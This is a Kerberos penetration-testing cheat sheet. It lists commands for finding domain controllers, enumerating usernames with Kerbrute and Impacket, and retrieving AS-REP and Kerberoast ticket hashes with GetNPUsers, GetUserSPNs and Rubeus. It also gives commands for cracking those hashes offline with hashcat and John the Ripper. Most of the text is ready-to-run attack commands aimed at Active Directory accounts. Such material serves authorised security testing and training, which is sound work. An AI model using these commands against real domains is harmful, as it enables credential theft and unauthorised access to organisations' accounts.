Port 88 – Kerberos
Pentesting Kerberos
Discovery and Enumeration
To attack and pentest Kerberos, you first need to identify the domain controllers (DCs) running the service. You will need to look for open port 88 and can use the tools and techniques I’ve detailed here.
Scanning for Kerberos Services
Using Nmap, you can scan a single target, subnet, or file list of targets for any open Kerberos services in the environment.
nmap -p 88 --open 10.1.1.1 #Check if Kerberos is running on a single IP nmap -p 88 --open -iL targets.txt #Scan multiple Kerberos servers from a file nmap -p 88 --open 10.1.1.0/24 #Scan a subnet for open Kerberos services nmap -p 88 -sV 10.1.1.1 #Identify the Kerberos implementation and version
You can use NetExec to test targets for kerberos authentication support.
netexec smb 10.1.1.1 --kerberos #Check for Kerberos authentication support using NetExec
Enumerate domain controllers in Active Directory
To discover and identify Kerberos Key Distribution Centers (KDCs), which handle authentication requests, in the network you can use nslookup.
nslookup -querytype=SRV _kerberos._tcp.<domain>
Username Enumeration
Many Kerberos servers respond differently to valid and invalid usernames, allowing an attacker to enumerate valid accounts.
Using Kerbrute for User Enumeration
Kerbrute is an excellent tool for username enumeration and password spraying in Kerberos environments. Even without valid credentials, you can identify users. It can be found here.
kerbrute userenum -d <domain> --dc <domain-controller-ip> userlist.txt #Checks if the listed usernames exist in the Active Directory domain
Using Impacket’s GetNPUsers
The Impacket toolset contains the GetNPUsers script that can be used to enumerate users without pre-authentication enabled. You can download the script here.
GetNPUsers.py <domain>/ -usersfile userlist.txt -no-pass -dc-ip <target-ip> #Enumerate users by checking for accounts without pre-authentication enabled.
AS-REP Roasting (No Pre-Authentication)
AS-REP roasting exploits users who do not require pre-authentication, allowing an attacker to retrieve encrypted credentials without brute-forcing login attempts. The credentials are obtained as hashes which can be cracked offline using tools such as John the Ripper and Hashcat.
Using Impacket’s GetNPUsers
The Impacket GetNPUsers script can be used to retrieve the encrypted AS-REP hashes.
GetNPUsers.py <domain>/ -request -no-pass -dc-ip <target-ip> #Retrieve users who do not require pre-authentication enabled and thier AS-REP hashes
Cracking AS-REP Hashes with Hashcat
Once you have obtained the encrypted AS-REP hashes, you can use Hashcat to try to crack them.
hashcat -m 18200 -a 0 asrep-hashes.txt rockyou.txt --force #Attempt to crack AS-REP hashes with Hashcat
You can also use John the Ripper to attempt to crack AS-REP hashes. I have a detailed cheat sheet with custom rules here.
john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5asrep asrep_hashes.txt #Attempt to crack AS-REP hashes with John the Ripper
Kerberoasting (Extracting Service Hashes)
Kerberoasting targets service accounts by requesting TGS (Ticket Granting Service) tickets and cracking them offline. The following are tools and commands for requesting service ticket hashes for cracking.
Using Impacket’s GetUserSPNs
The ever-handy set of Impacket tools and the GetUserSPNs script can be used to obtain service ticket hashes. This script will try to find Service Principal Names associated with normal user accounts. Since normal accounts’ passwords tend to be shorter than machine accounts, and knowing that a TGS request will encrypt the ticket with the account the SPN is running under, this could be used for an offline brute-forcing attack of the SPNs account NTLM hash if we can gather valid TGS for those SPNs.
GetUserSPNs.py <domain>/<user>:<password> -dc-ip <target-ip> -request #Retrieves service ticket hashes, which can be cracked offline.
Using Rubeus for Kerberoasting
Rubeus is a C# toolset for raw Kerberos interaction and abuses. It can also be used for Kerebroasting and can be found here.
Rubeus.exe kerberoast /domain:<domain> /user:<user> /password:<password> #Extracts Kerberos service tickets for offline cracking.
Cracking Kerberos Service Hashes
You can crack Kerberos service ticket hashes with either Hashcat or John the Ripper.
hashcat -m 13100 -a 0 kerberoast-hashes.txt rockyou.txt --force #Cracking kerberos service ticket hashes with Hashcat john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs kerberoast_hashes.txt #Cracking kerberos service ticket hashes with John the Ripper